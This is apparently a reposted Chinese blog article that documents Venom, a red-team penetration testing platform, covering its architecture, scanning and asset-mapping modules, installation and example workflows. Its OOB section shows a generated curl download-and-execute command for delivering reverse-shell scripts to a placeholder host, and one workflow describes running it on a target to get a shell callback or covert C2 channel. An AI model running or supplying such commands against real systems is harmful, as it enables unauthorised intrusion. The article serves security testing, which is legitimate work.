文章总结: Venom是由Zcentury开发的新一代红队作战平台,采用Electron+Vue3前端与Go语言引擎的模块化架构,整合资产发现、漏洞扫描、数据处理等全链路渗透测试功能。核心模块包括极速端口扫描、空间测绘聚合、OOB战术套件、小程序逆向等,支持通过gRPC实现数据流转。文档提供了安装部署指南和典型工作流示例,如资产测绘突破与无回显漏洞验证。 综合评分: 83 文章分类: 红队,安全工具,渗透测试,WEB安全,内网渗透
Venom——集成化安全测试平台
一个人挺好 一个人挺好
一个人挺好 wa
2026年4月16日 23:03 上海
在小说阅读器读本章
去阅读
项目地址
https://github.com/Zcentury/Venom
Venom 技术文档
1. 项目概述
Venom 是由 Zcentury 开发的新一代红队作战平台,定位为”致命精准的红队作战兵器”。该项目采用现代化技术栈构建,旨在解决传统安全工具分散、操作复杂的痛点,通过模块化设计将资产发现、漏洞扫描、数据处理、移动安全等功能整合于统一界面。
核心定位:全链路渗透测试工作流平台,覆盖从情报收集到漏洞利用的完整攻击链。
技术架构:
- 前端界面:Electron + Vue3
- 通信协议:gRPC
- 后端引擎:Go 语言开发的高并发扫描引擎(Venom-Engine)
- 支持平台:Windows、macOS、Linux
2. 系统架构
2.1 整体架构
┌─────────────────────────────────────────────────────────────┐
│ 前端层 (Electron) │
│ ┌──────────┬──────────┬──────────┬──────────┬──────────┐ │
│ │ 端口扫描 │ 空间测绘 │ 数据处理 │ OOB工具 │ 小程序 │ │
│ │ 模块 │ 模块 │ 工坊 │ 套件 │ 逆向 │ │
│ └──────────┴──────────┴──────────┴──────────┴──────────┘ │
└──────────────────────────┬──────────────────────────────────┘
│ gRPC
┌──────────────────────────▼──────────────────────────────────┐
│ 引擎层 (Venom-Engine) │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────────┐ │
│ │ 端口扫描引擎 │ │ 指纹识别引擎 │ │ 数据加解密引擎 │ │
│ └──────────────┘ └──────────────┘ └──────────────────┘ │
└─────────────────────────────────────────────────────────────┘
2.2 模块设计原则
Venom 采用模块化设计,每个功能模块独立运作又可通过数据流联动:
- 输入标准化:各模块输出统一格式数据,可直接作为其他模块输入
- 插件化架构:支持自定义工具集成和脚本扩展
- 数据流转:扫描结果可直接导入数据处理工坊,提取的接口可直接用于漏洞验证
3. 核心功能模块详解
3.1 极速端口扫描
功能定位:多线程并发资产发现引擎
技术特性:
- 高并发多线程端口探测
- 服务指纹识别(开发中)
- HTTP 存活探测(开发中)
- 实时进度监控与可视化
- 支持自定义端口组(如企业内网 Top100 端口)
应用场景:将空间测绘结果直接导入扫描引擎,快速收敛攻击面。
3.2 空间测绘聚合
功能定位:多源情报聚合与资产侦察
技术特性:
- 聚合 FOFA / Hunter / Quake 等主流空间测绘平台 API
- 统一数据格式输出,打破数据孤岛
- 一键检索目标资产,快速获取 IP、端口、服务指纹
- 支持结果导出与下游模块联动
数据流:空间测绘结果 → 端口扫描 → 漏洞验证
3.3 数据处理工坊
功能定位:零代码数据清洗与加解密中心
核心能力:
表格
| 子模块 | 功能描述 | 技术细节 |
| — | — | — |
| JSON 智能提取 | 无需手写正则,通过路径表达式提取字段 | 支持 data.list.phone 等路径语法,秒级处理数万行数据 |
| 编码转换 | 常见编码互转 | Base64 / Hex / URL / Unicode 等 |
| 国密算法 | 国产密码学支持 | SM2 / SM3 / SM4 及 AES / RSA |
| 数据对比 | 文本差异比对 | 快速定位两次请求/响应的参数变化 |
典型场景:处理海量 API 返回包,提取手机号、Token 等敏感字段。
3.4 OOB 战术套件 (Out-of-Band)
功能定位:带外攻击验证与隐蔽通道构建
核心组件:
- 私有 DNSLog
- 一键生成专属子域名(如
xxx.xxx.xxx) - 实时监听 DNS 解析记录
- 绕过对公开 Log 平台的封锁
- Payload 极速投递
-
内置轻量级 HTTP 文件服务
-
一键上传 EXP 或反弹 Shell 脚本
-
自动生成下载执行命令:
-
“` curl-L http://xxxxxxx/file/2/file -o echo.sh &&chmod +x echo.sh &&bash echo.sh
**应用场景**:验证无回显漏洞(Blind RCE/SSRF),构建隐蔽 C2 通道。
### 3.5 小程序逆向 (Wxapkg)
**功能定位**:移动端小程序安全分析
**技术能力**:
* 拖拽式自动解包 Wxapkg 文件
* 自动解析目录结构,提取 `app-service.js` 等核心源码
* 自动识别并提取小程序调用的所有 API 接口(URL)
* 支持自定义解析规则
**安全价值**:协助排查小程序前端代码泄露风险,发现隐藏接口。
### 3.6 武器库启动器
**功能定位**:个性化渗透测试工具链编排
**核心功能**:
* 快捷方式集成:支持集成 **Burp Suite、Cobalt Strike、JAR 包** 等第三方工具
* 自定义启动参数:如 `java -jar burp.jar`
* 单点登录式体验:无需在杂乱文件夹中寻找工具
### 3.7 间影·特战版(影子资产发现)
**功能定位**:发掘前端不可见的"影子资产"
**技术特点**:
* 挖掘前端不可见但承载核心逻辑的隐藏接口
* 系统性评估隐藏接口的越权与逻辑漏洞
---
## 4. 安装部署
### 4.1 预编译版本安装
**下载地址**:GitHub Releases
**安装步骤**:
1. 根据操作系统下载对应安装包
2. 双击安装,桌面自动生成「Venom」图标
3. 首次打开配置 DNSLog 与工具路径,30 秒完成初始化
### 4.2 引擎手动部署
若自动下载引擎失败,可手动部署:
**引擎下载**:Venom-Engine Releases
**存放路径**:
* **Windows**: `C:\Users\{{username}}\AppData\Roaming\Venom\engine`
* **macOS**: `/Users/{{username}}/Library/Application Support/Venom/engine`
### 4.3 macOS 特别说明
若遇到 `"Venom"已损坏,无法打开` 提示,执行:
sudo xattr -dr com.apple.quarantine /Applications/Venom.app
---
## 5. 使用指南
### 5.1 典型工作流
#### 场景一:资产测绘与边界突破
- 空间测绘:使用 FOFA/Hunter API 检索目标资产 ↓
- 结果导入:将测绘结果直接导入端口扫描模块 ↓
- 端口扫描:自定义端口组,开启多线程探测 ↓
- 指纹识别:识别服务类型与版本
#### 场景二:无回显漏洞验证
- OOB 套件:启动私有 DNSLog,生成专属域名 ↓
- 构造 Payload:使用 Payload 投递服务上传反弹脚本 ↓
- 漏洞利用:在目标系统执行 curl 命令下载并运行脚本 ↓
- 监听验证:在 Venom 中查看 DNS 解析记录或 Shell 回连
#### 场景三:小程序安全审计
- 获取 Wxapkg:从小程序开发者工具或手机端提取包文件 ↓
- 拖拽解包:将文件拖入 Venom 小程序逆向模块 ↓
- 源码分析:查看反编译后的 JavaScript 源码 ↓
- 接口提取:自动提取所有 API 端点进行安全测试 “`
5.2 数据处理实战示例
任务:从数万行 JSON 中提取所有手机号
操作步骤:
- 进入「数据处理工坊」→「JSON 提取」
- 粘贴 JSON 数据
- 输入提取路径:
data.list.phone - 秒级提取结果,支持导出 CSV
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:一个人挺好 wa 一个人挺好 一个人挺好《Venom——集成化安全测试平台》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论